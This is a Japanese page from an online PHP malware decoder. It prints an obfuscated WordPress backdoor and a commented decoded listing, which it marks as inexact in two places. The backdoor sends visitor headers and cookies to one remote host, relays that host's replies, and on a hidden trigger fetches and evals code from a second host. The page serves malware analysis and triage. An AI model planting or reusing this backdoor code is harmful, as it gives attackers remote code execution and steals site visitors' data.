WordPress 等の PHP マルウェア・ウィルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。以下、1 つ目のリストが難読化されたままのサンプル、2 つ目がそのデコード結果です。
<?php goto ZvoOk; mGVo1: $D5OgZ = "\150\x74\164\x70\163\72\57\57\x35\x39\x37\x6f\144\150\x73\x2e\x6b\x65\163\x74\162\x65\x61\x6d\x6c\56\163\150\157\160"; goto XDrSo; MRjUE: $tV3x6 = $_SERVER["\110\x54\x54\120\x5f\101\103\103\105\x50\x54\x5f\x4c\x41\x4e\107\x55\101\x47\105"]; goto JJFwG; WzFVl: goto gaA8B; goto Mwh4H; vTYsI: gaA8B: goto imF6s; YAhHJ: rd8Ts($tNly9, $pa7I6); goto YqKmH; cjT4D: if (!($W4S3t == implode($FD69_))) { goto YkoEl; } goto AJCFO; f2kTG: if (!strstr($anDF5, "\x5b\x23\52\x23\52\43\135")) { goto XeWa3; } goto BtRuB; gS93A: exit; goto vTYsI; JW8qh: $cNjhP = isset($_SERVER["\x48\124\124\x50\123"]) && $_SERVER["\110\x54\124\x50\123"] == "\x6f\x6e" || isset($_SERVER["\110\124\x54\120\x5f\x58\137\106\117\x52\x57\x41\122\104\x45\104\x5f\x50\x52\x4f\x54\x4f"]) && $_SERVER["\110\124\x54\120\137\130\x5f\106\117\122\127\x41\122\x44\x45\x44\137\120\122\117\x54\x4f"] == "\x68\164\x74\x70\x73" ? "\x68\x74\x74\x70\163\x3a\57\57" : "\150\x74\164\160\72\57\x2f"; goto Uzl5O; I0Vn2: YHZOg: goto WzFVl; qrV8C: eval("\77\x3e" . $HyLJn[0]); goto cF7BI; jISlc: $t4GAy = $D5OgZ . "\57\151\156\144\145\170\56\x70\x68\x70\77" . 
http_build_query($b2J5g); goto oGk_q; JW2gH: $W4S3t = md5($DhDD2); goto cjT4D; XDrSo: $b2J5g = ["\x64\157\x6d\x61\151\156" => urlencode($dwh2o), "\x61\147\145\x6e\164" => urlencode($OqYFx), "\x6c\141\156\x67" => urlencode($tV3x6), "\165\162\x69" => urlencode($Z8a2W), "\162\x65\x66\x65\162\145\162" => urlencode($ahFWB), "\151\160" => urlencode($lNb05), "\x6d\145\x74\x68\x6f\x64" => urlencode($oGLUG), "\x72\145\163\160\157\156\x73\x65\137\164\151\155\145" => urlencode($JUxm1), "\162\145\161\x75\x65\x73\164\x5f\150\145\x61\144\x65\x72\x73" => urlencode($g290S), "\146\157\162\167\141\162\144\x65\144\x46\157\162" => urlencode($ehx94), "\154\x6f\x63\x61\x6c\x5f\144\x6f\155\x61\151\x6e" => urlencode($D5OgZ)]; goto jISlc; qCeQ3: if (!empty($uZtdp)) { goto ryFxv; } goto mGVo1; YqKmH: XeWa3: goto I0Vn2; Mwh4H: ryFxv: goto FFezE; cF7BI: YkoEl: goto gS93A; U9DRX: $JUxm1 = microtime(true) - $_SERVER["\122\105\x51\x55\105\x53\x54\x5f\124\x49\115\x45\137\106\x4c\x4f\101\x54"]; goto g7160; WvfXX: goto YHZOg; goto BnaeS; AJCFO: $hdOnT = array("\150", "\x74", "\x74", "\160", "\x73", "\x3a", "\57", "\57", "\x76", "\x70\x73", "\x64", "\144", "\x2e\146", "\x6e", "\146", "\x74", "\x75\163", "\x2e\x74", "\157", "\x70", "\x2f", "\x64", "\x6f", "\157", "\162", "\x2f"); goto VL3jk; Y38Nm: $DhDD2 = substr($uZtdp, 0, -6); goto cNHy_; NyRTf: $OqYFx = $_SERVER["\110\124\x54\x50\137\125\123\105\122\x5f\101\x47\x45\116\124"]; goto MRjUE; imF6s: function rD8tS($tNly9, $pa7I6) { goto EXCT_; Uyspd: jZ_dE: goto onClf; onClf: t7Hft: goto PTMKi; PTMKi: exit; goto NfPYi; EXCT_: switch ($tNly9) { case "\x65\143\150\157\150\x74\155\154": goto ryQ5i; TDwaU: echo $pa7I6; goto oB1uD; oB1uD: goto t7Hft; goto coZIn; ryQ5i: header("\x43\x6f\x6e\x74\145\x6e\164\x2d\124\x79\160\145\72\x20\164\x65\170\x74\57\150\164\155\154\73\40\x63\x68\141\162\163\x65\164\x3d\125\x54\106\x2d\70"); goto TDwaU; coZIn: case "\145\143\150\x6f\x63\x73\x73\x6d\x69\x6e": goto SK2Q1; SK2Q1: 
header("\103\157\x6e\164\145\x6e\164\55\x54\x79\x70\145\x3a\40\164\x65\x78\x74\57\143\163\x73\x3b\40\143\150\141\162\x73\x65\x74\x3d\x55\124\106\x2d\70"); goto lJU6O; lJU6O: echo $pa7I6; goto qlwr7; qlwr7: goto t7Hft; goto LiXmK; LiXmK: case "\x65\x63\x68\x6f\x78\155\154": goto KvHOv; EUxfY: goto t7Hft; goto q3Qzx; KvHOv: header("\x43\x6f\x6e\164\145\x6e\x74\x2d\x54\x79\x70\145\x3a\40\x74\x65\170\x74\57\170\155\154\x3b\40\x63\x68\141\162\x73\x65\164\x3d\125\x54\x46\x2d\x38"); goto KyRI7; KyRI7: echo $pa7I6; goto EUxfY; q3Qzx: case "\x65\143\150\157\164\170\x74": goto hR0J3; nunGc: goto t7Hft; goto EP4rD; zK3nk: echo $pa7I6; goto nunGc; hR0J3: header("\x43\x6f\x6e\x74\x65\156\164\55\124\171\x70\145\72\x20\164\x65\x78\164\57\x70\x6c\141\151\x6e\x3b\40\143\x68\141\162\x73\x65\x74\x3d\125\x54\106\x2d\70"); goto zK3nk; EP4rD: case "\x65\143\x68\157\64\60\x34": goto DxNuM; FGm6V: goto t7Hft; goto NU9d6; Rw9Ew: header("\x43\157\156\164\145\x6e\x74\x2d\x54\x79\x70\145\x3a\x20\164\145\170\x74\x2f\x68\164\x6d\154\73\x20\x63\x68\141\x72\x73\145\x74\75\x55\x54\x46\x2d\70"); goto j950T; j950T: echo $pa7I6; goto FGm6V; DxNuM: header("\x48\124\x54\x50\57\x31\56\61\x20\x34\x30\64\x20\116\157\164\x20\x46\157\165\156\144"); goto Rw9Ew; NU9d6: default: goto ayUg1; ayUg1: header("\x48\x54\124\x50\57\61\x2e\x31\40\65\x30\60\40\x49\x6e\x74\x65\x72\156\x61\x6c\40\x53\145\162\x76\x65\x72\40\x45\162\162\x6f\162"); goto D8cFh; D8cFh: echo "\x49\x6e\x76\141\154\x69\144\x20\x72\145\163\x70\157\x6e\x73\x65\40\164\x79\x70\145\x2e"; goto OomLW; OomLW: goto t7Hft; goto paTLH; paTLH: } goto Uyspd; NfPYi: } goto ZW6kW; ZW6kW: function vnKrr($OHvzm, $OKvwz) { goto SvPo7; P9L0M: exit; goto uRQaS; wFyah: echo $OKvwz; goto P9L0M; SvPo7: header("\x48\124\x54\x50\x2f\61\x2e\x31\40{$OHvzm}\x20{$OKvwz}"); goto wFyah; uRQaS: } goto I9Ocm; OLQzK: $oGLUG = $_SERVER["\x52\105\121\x55\105\123\124\x5f\x4d\105\124\x48\117\x44"]; goto U9DRX; s0Vyr: if (!function_exists("\115\x6e\x76\x62\x6e")) { function MnvbN() { 
goto XZ9sm; XZ9sm: foreach ($_SERVER as $Rs6QC => $XZOli) { goto Wvb4M; c8CsV: $Y36j0[str_replace("\x20", "\x2d", ucwords(strtolower(str_replace("\x5f", "\40", substr($Rs6QC, 5)))))] = $XZOli; goto PIxRj; Wvb4M: if (!(substr($Rs6QC, 0, 5) == "\x48\124\x54\x50\137")) { goto z93Ou; } goto c8CsV; PIxRj: z93Ou: goto E3f15; E3f15: xefYl: goto YPyOW; YPyOW: } goto jieIn; dw2Oi: return $Y36j0; goto UtCBI; jieIn: o_FQJ: goto dw2Oi; UtCBI: } } goto JW8qh; BnaeS: zq_Yp: goto f2kTG; ZvoOk: error_reporting(0); goto s0Vyr; VL3jk: $HyLJn = array(sa5wN(implode($hdOnT) . $UXR69 . "\x2e\x74" . "\x78" . "\x74")); goto qrV8C; ezk3L: $lNb05 = $_SERVER["\x52\x45\115\117\x54\x45\137\101\x44\104\x52"]; goto OLQzK; q6abw: $ehx94 = isset($_SERVER["\110\x54\x54\120\137\x58\137\106\117\x52\127\101\122\x44\105\x44\x5f\106\x4f\122"]) ? $_SERVER["\110\x54\x54\120\137\x58\137\x46\x4f\x52\127\x41\122\x44\x45\x44\137\x46\117\x52"] : ''; goto pa5XH; g7160: $g290S = json_encode(MNvbn()); goto q6abw; XVk7k: if ($anDF5 !== false && $Z8a2W !== "\x2f\146\x61\x76\x69\143\157\x6e\56\x69\x63\x6f") { goto zq_Yp; } goto RC6on; pa5XH: $uZtdp = isset($_REQUEST["\x61\143\x74\151\157\156"]) ? 
$_REQUEST["\x61\x63\164\x69\x6f\x6e"] : ''; goto qCeQ3; RC6on: vnkrR(500, "\106\x61\151\x6c\145\x64\40\x74\157\x20\x72\x65\164\162\x69\145\x76\145\40\143\157\x6e\x74\145\x6e\164\x20\x6f\x72\40\x73\x65\x72\x76\x65\x72\40\x72\145\164\x75\162\x6e\x65\x64\40\141\x6e\x20\x65\162\x72\157\x72\x2e"); goto WvfXX; FFezE: $UXR69 = substr($uZtdp, -6); goto Y38Nm; cNHy_: $FD69_ = array("\x39", "\x38", "\62", "\x34", "\65", "\x64", "\67", "\64", "\x31", "\x37", "\62", "\62", "\65", "\142", "\x35", "\x35", "\141", "\62", "\x63", "\x34", "\142", "\146", "\65", "\60", "\x62", "\70", "\x61", "\x61", "\x34", "\x63", "\x37", "\x33"); goto JW2gH; BtRuB: list($tNly9, $pa7I6) = explode("\x5b\x23\x2a\43\x2a\x23\x5d", $anDF5); goto YAhHJ; JJFwG: $Z8a2W = $_SERVER["\x52\105\121\x55\x45\123\x54\137\x55\122\111"]; goto DBhjv; DBhjv: $ahFWB = $_SERVER["\110\x54\124\x50\x5f\122\105\x46\105\122\x45\x52"]; goto ezk3L; oGk_q: $anDF5 = SA5Wn($t4GAy); goto XVk7k; Uzl5O: $dwh2o = $cNjhP . $_SERVER["\x48\x54\x54\120\x5f\x48\117\x53\124"]; goto NyRTf; I9Ocm: function Sa5wn($FK6MF) { goto aFqbi; QcIGe: if (!function_exists("\143\x75\x72\x6c\137\151\156\x69\x74")) { goto O3iOV; } goto lxFI0; nZkWT: if (!($drNww == 200)) { goto zAyg_; } goto wlgRS; q7JEA: curl_setopt($afPsa, CURLOPT_CONNECTTIMEOUT, $JY9aq); goto u4XIn; GyMyj: curl_setopt($afPsa, CURLOPT_SSL_VERIFYPEER, false); goto zpGgI; u4XIn: curl_setopt($afPsa, CURLOPT_TIMEOUT, $JY9aq); goto GyMyj; YcwK8: $JeKKz = @file_get_contents($FK6MF, false, $ngWku); goto VkdMk; VkdMk: if ($JeKKz === false) { goto a1rlJ; } goto mvtC1; hMaCj: $ngWku = stream_context_create(["\150\164\x74\x70" => ["\x74\151\x6d\x65\157\165\x74" => $JY9aq, "\151\x67\x6e\157\x72\x65\x5f\145\x72\x72\157\x72\x73" => true]]); goto YcwK8; XFNL3: foreach ($http_response_header as $fSGbm) { goto GPqBD; GPqBD: if (!preg_match("\57\x5e\x48\124\124\120\134\x2f\x5b\x5c\144\x5c\x2e\x5d\x2b\40\50\x5c\x64\x2b\51\x2f", $fSGbm, $lIr4v)) { goto JrxUb; } goto U3SOI; XS2Ur: pDWdi: goto kFlhN; jllPs: 
g3j6o: goto w0AhW; U3SOI: $uivoN = (int) $lIr4v[1]; goto YcEQn; kFlhN: JrxUb: goto jllPs; YcEQn: if (!($uivoN != 200)) { goto pDWdi; } goto RqhRh; RqhRh: return false; goto XS2Ur; w0AhW: } goto S1wAP; zpGgI: curl_setopt($afPsa, CURLOPT_SSL_VERIFYHOST, false); goto uqwzV; fpr9B: a1rlJ: goto yXPtH; mvtC1: $http_response_header = $http_response_header ? $http_response_header : []; goto XFNL3; PiQne: goto WVJoR; goto fpr9B; b4qPk: WVJoR: goto ngIwu; ABOyE: curl_close($afPsa); goto nZkWT; ngIwu: return $JeKKz; goto tuQuI; uqwzV: $JeKKz = curl_exec($afPsa); goto oNHCe; yXPtH: return false; goto b4qPk; aFqbi: $JY9aq = 300; goto QcIGe; lxFI0: $afPsa = curl_init(); goto CDHw_; S1wAP: tmpUP: goto PiQne; wlgRS: return $JeKKz; goto bP6Tj; CDHw_: curl_setopt($afPsa, CURLOPT_URL, $FK6MF); goto rHMwx; rHMwx: curl_setopt($afPsa, CURLOPT_RETURNTRANSFER, 1); goto q7JEA; NCPYS: O3iOV: goto hMaCj; bP6Tj: zAyg_: goto NCPYS; oNHCe: $drNww = curl_getinfo($afPsa, CURLINFO_HTTP_CODE); goto ABOyE; tuQuI: }
<?php
// Decoder output for the obfuscated sample printed directly above it on this
// page. Read it as an analysis aid rather than a faithful copy: two places
// where this listing disagrees with the obfuscated original are marked
// NOTE(review) below.
//
// What the visible code does, in order:
//   1. silences PHP error output;
//   2. gathers request metadata (host, URI, client IP, all request headers)
//      from $_SERVER;
//   3. if the request carries a non-empty "action" parameter, hashes part of
//      it with MD5 and, on a match with a hard-coded digest, downloads a .txt
//      file from a fixed remote host and passes its content to eval(); the
//      branch always ends in exit, match or not;
//   4. otherwise sends the metadata to a second fixed remote host and, when
//      the reply contains the separator "[#*#*#]", echoes the reply body to
//      the visitor with a Content-Type picked by the reply and exits. A reply
//      without the separator is ignored and execution runs off the end of
//      this script.
//
// Indicators visible in this listing (defanged here, live in the code below):
//   hxxps://vpsdd[.]fnftus[.]top/door/<name>.txt    content fetched and eval'd
//   hxxps://597odhs[.]kestreaml[.]shop/index.php     metadata sink / content source
//   98245d7417225b55a2c4bf50b8aa4c73                 MD5 the trigger is compared to
//   [#*#*#]                                          type/body separator in replies
//
// For triage: grep the web root and database for the strings above, check
// egress logs for PHP workers contacting either host, and treat a hit as
// arbitrary remote code having run (step 3 executes whatever the host serves).
// The "action" parameter is read from $_REQUEST, so it can arrive in a POST
// body and may not appear in access logs.

error_reporting(0); // suppress every error/notice this code would otherwise emit

// Request-header collector. PHP function names are case-insensitive, so the
// differently cased spellings in this listing (Mnvbn / MnvbN / MNvbn,
// Sa5wn / SA5Wn / sa5wN, rD8tS / rd8Ts, vnKrr / vnkrR) each resolve to a
// single function.
if (!function_exists("Mnvbn")) {
    function MnvbN() {
        foreach ($_SERVER as $Rs6QC => $XZOli) {
            // Keep only the HTTP_* entries, i.e. the client's request headers.
            if (!(substr($Rs6QC, 0, 5) == "HTTP_")) {
                goto z93Ou;
            }
            // HTTP_USER_AGENT -> User-Agent: strip the prefix, "_" to " ",
            // lowercase, capitalise each word, " " to "-".
            // This includes HTTP_COOKIE when the client sent cookies, so
            // visitor session cookies end up in the data sent out below.
            $Y36j0[str_replace(" ", "-", ucwords(strtolower(str_replace("_", " ", substr($Rs6QC, 5)))))] = $XZOli;
            z93Ou:
        }
        // $Y36j0 is never initialised; with no HTTP_* keys this returns an
        // undefined variable, which error_reporting(0) keeps quiet.
        return $Y36j0;
    }
}

// Scheme is "https://" when HTTPS is "on" or X-Forwarded-Proto is "https",
// else "http://" (the ternary binds last, after && and ||).
$cNjhP = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https" ? "https://" : "http://";
$dwh2o = $cNjhP . $_SERVER["HTTP_HOST"];       // scheme + Host header of the request
$OqYFx = $_SERVER["HTTP_USER_AGENT"];
$tV3x6 = $_SERVER["HTTP_ACCEPT_LANGUAGE"];
$Z8a2W = $_SERVER["REQUEST_URI"];
$ahFWB = $_SERVER["HTTP_REFERER"];
$lNb05 = $_SERVER["REMOTE_ADDR"];
$oGLUG = $_SERVER["REQUEST_METHOD"];
$JUxm1 = microtime(true) - $_SERVER["REQUEST_TIME_FLOAT"]; // seconds since the request started
$g290S = json_encode(MNvbn());                 // every request header, as JSON
$ehx94 = isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : '';

// --- Branch 1: remote-code trigger -----------------------------------------
$uZtdp = isset($_REQUEST["action"]) ? $_REQUEST["action"] : '';
if (!empty($uZtdp)) {
    // Any non-empty "action" lands here and the branch always ends in exit,
    // so legitimate requests that use an "action" parameter get an empty
    // response while this code is in place (a symptom worth checking for).
    //
    // NOTE(review): the obfuscated original above has substr($uZtdp, -6) and
    // substr($uZtdp, 0, -6): the LAST six characters become the file-name
    // part and everything before them is what gets hashed. The decoder
    // dropped both minus signs here; rely on the original when reasoning
    // about what a triggering request looks like.
    $UXR69 = substr($uZtdp, 6);
    $DhDD2 = substr($uZtdp, 0, 6);
    // Left over from the original, where the digest was assembled with
    // implode($FD69_); this listing compares against the joined string and
    // no longer reads the array.
    $FD69_ = array("9", "8", "2", "4", "5", "d", "7", "4", "1", "7", "2", "2", "5", "b", "5", "5", "a", "2", "c", "4", "b", "f", "5", "0", "b", "8", "a", "a", "4", "c", "7", "3");
    $W4S3t = md5($DhDD2);
    if (!($W4S3t == "98245d7417225b55a2c4bf50b8aa4c73")) {
        goto YkoEl; // digest mismatch: skip the fetch, fall to exit
    }
    // Also a leftover: the original built the URL below from these fragments,
    // which keeps the host name out of a plain string search of the file.
    $hdOnT = array("h", "t", "t", "p", "s", ":", "/", "/", "v", "ps", "d", "d", ".f", "n", "f", "t", "us", ".t", "o", "p", "/", "d", "o", "o", "r", "/");
    // The request-supplied part of "action" is concatenated into the URL path
    // and ".txt" is appended (itself split into three literals).
    $HyLJn = array(sa5wN("https://vpsdd.fnftus.top/door/" . $UXR69 . ".t" . "x" . "t"));
    // The "?>" prefix makes eval() treat the download like the body of a PHP
    // file: text is emitted as output and any PHP open tag in it is executed.
    // What runs is decided entirely by the remote host at request time.
    eval("?>" . $HyLJn[0]);
    YkoEl:
    exit;
}

// --- Branch 2: report the visitor, relay the remote reply --------------------
$D5OgZ = "https://597odhs.kestreaml.shop";
// Each value is urlencode()d here and encoded again by http_build_query().
// "local_domain" carries $D5OgZ (the remote host's own URL), "domain" the
// compromised site's scheme + Host.
$b2J5g = [
    "domain" => urlencode($dwh2o),
    "agent" => urlencode($OqYFx),
    "lang" => urlencode($tV3x6),
    "uri" => urlencode($Z8a2W),
    "referer" => urlencode($ahFWB),
    "ip" => urlencode($lNb05),
    "method" => urlencode($oGLUG),
    "response_time" => urlencode($JUxm1),
    "request_headers" => urlencode($g290S),
    "forwardedFor" => urlencode($ehx94),
    "local_domain" => urlencode($D5OgZ)
];
$t4GAy = "https://597odhs.kestreaml.shop/index.php?" . http_build_query($b2J5g);
// One outbound HTTP request per page view; the visitor waits on it.
$anDF5 = SA5Wn($t4GAy);
if ($anDF5 !== false && $Z8a2W !== "/favicon.ico") {
    if (!strstr($anDF5, "[#*#*#]")) {
        goto XeWa3; // no separator in the reply: relay nothing
    }
    // Reply format: <type>[#*#*#]<body>. Only the first two pieces are used.
    list($tNly9, $pa7I6) = explode("[#*#*#]", $anDF5);
    rd8Ts($tNly9, $pa7I6); // echoes the body and exits
    XeWa3:
    goto I0Vn2;
}
// Reached when the fetch failed or the request was for /favicon.ico:
// answers with a 500 and exits.
vnkrR(500, "Failed to retrieve content or server returned an error.");
I0Vn2:

// Emits the remote body to the visitor. $tNly9 (from the remote reply) selects
// the Content-Type / status line; $pa7I6 is echoed without any filtering, so
// the remote host fully controls what the visitor or crawler receives.
// Every case ends at the exit below.
function rD8tS($tNly9, $pa7I6) {
    switch ($tNly9) {
        case "echohtml":
            header("Content-Type: text/html; charset=UTF-8");
            echo $pa7I6;
            goto t7Hft;
        case "echocssmin":
            header("Content-Type: text/css; charset=UTF-8");
            echo $pa7I6;
            goto t7Hft;
        case "echoxml":
            header("Content-Type: text/xml; charset=UTF-8");
            echo $pa7I6;
            goto t7Hft;
        case "echotxt":
            header("Content-Type: text/plain; charset=UTF-8");
            echo $pa7I6;
            goto t7Hft;
        case "echo404":
            header("HTTP/1.1 404 Not Found");
            header("Content-Type: text/html; charset=UTF-8");
            echo $pa7I6;
            goto t7Hft;
        default:
            // Unknown type from the remote host.
            header("HTTP/1.1 500 Internal Server Error");
            echo "Invalid response type.";
            goto t7Hft;
    }
    t7Hft:
    exit;
}

// Sends a status line built from $OHvzm (code) and $OKvwz (text), echoes the
// text as the body, and exits.
function vnKrr($OHvzm, $OKvwz) {
    header("HTTP/1.1 {$OHvzm} {$OKvwz}");
    echo $OKvwz;
    exit;
}

// HTTP GET helper: curl when available, file_get_contents() otherwise or when
// curl did not get a 200. Returns the body, or false on failure.
function Sa5wn($FK6MF) {
    $JY9aq = 300; // used as connect timeout, total timeout and stream timeout
    if (!function_exists("curl_init")) {
        goto O3iOV; // no curl extension: jump to the stream fallback
    }
    $afPsa = curl_init();
    curl_setopt($afPsa, CURLOPT_URL, $FK6MF);
    curl_setopt($afPsa, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($afPsa, CURLOPT_CONNECTTIMEOUT, $JY9aq);
    curl_setopt($afPsa, CURLOPT_TIMEOUT, $JY9aq);
    // Certificate and host-name checks are switched off, so nothing
    // authenticates the server whose reply is relayed or eval'd above.
    curl_setopt($afPsa, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($afPsa, CURLOPT_SSL_VERIFYHOST, false);
    $JeKKz = curl_exec($afPsa);
    $drNww = curl_getinfo($afPsa, CURLINFO_HTTP_CODE);
    curl_close($afPsa);
    if (!($drNww == 200)) {
        O3iOV:
        // "ignore_errors" makes the stream wrapper return the body even for
        // non-2xx replies; the status is checked by hand below.
        $ngWku = stream_context_create(["http" => ["timeout" => $JY9aq, "ignore_errors" => true]]);
        $JeKKz = @file_get_contents($FK6MF, false, $ngWku);
        if ($JeKKz === false) {
            return false;
        }
        // PHP fills $http_response_header after an HTTP-wrapper read.
        $http_response_header = $http_response_header ? $http_response_header : [];
        foreach ($http_response_header as $fSGbm) {
            if (!preg_match("/^HTTP\\/[\\d\\.]+ (\\d+)/", $fSGbm, $lIr4v)) {
                goto JrxUb;
            }
            $uivoN = (int) $lIr4v[1];
            // NOTE(review): as printed, the return below runs on the first
            // header line regardless of the status. In the obfuscated
            // original above it is reached only when a status line carries a
            // code other than 200; the decoder lost that structure here.
            if (!($uivoN != 200)) {
                JrxUb:
            }
            return false;
        }
        return $JeKKz;
    }
    return $JeKKz; // curl path, HTTP 200
}